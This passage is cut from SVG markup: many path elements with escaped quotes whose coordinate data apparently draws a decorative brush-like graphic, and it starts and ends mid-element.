d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path 